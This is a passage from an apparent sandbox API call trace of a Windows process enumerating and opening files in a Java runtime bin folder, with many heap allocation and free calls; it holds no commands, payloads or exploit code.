lpNewFilePointer=0x0) returned 1 [0091.152] CloseHandle (hObject=0x360) returned 1 [0091.152] AreFileApisANSI () returned 1 [0091.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45e18 [0091.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 51 [0091.152] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.153] GetFileType (hFile=0x360) returned 0x1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0091.153] CloseHandle (hObject=0x360) returned 1 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.154] AreFileApisANSI () returned 1 [0091.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46748 [0091.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 51 [0091.154] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13a40)) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0091.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.154] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javafx_font.dll", cAlternateFileName="JAVAFX~1.DLL")) returned 1 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0091.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0091.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0091.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0091.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0091.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.155] AreFileApisANSI () returned 1 [0091.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll", lpUsedDefaultChar=0x0) returned 55 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0091.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0091.155] AreFileApisANSI () returned 1 [0091.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0091.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76098 [0091.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 55 [0091.155] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.156] GetFileType (hFile=0x360) returned 0x1 [0091.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0091.156] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.156] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.220] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.220] CloseHandle (hObject=0x360) returned 1 [0091.220] AreFileApisANSI () returned 1 [0091.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0091.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76110 [0091.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 55 [0091.220] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.221] GetFileType (hFile=0x360) returned 0x1 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0091.221] CloseHandle (hObject=0x360) returned 1 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.222] AreFileApisANSI () returned 1 [0091.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0091.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0091.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 55 [0091.222] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10e40)) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0091.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.224] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x83640, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javafx_font_t2k.dll", cAlternateFileName="JAVAFX~2.DLL")) returned 1 [0091.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0091.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0091.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0091.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0091.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0091.225] AreFileApisANSI () returned 1 [0091.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll", lpUsedDefaultChar=0x0) returned 59 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0091.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.225] AreFileApisANSI () returned 1 [0091.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0091.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0091.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 59 [0091.227] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 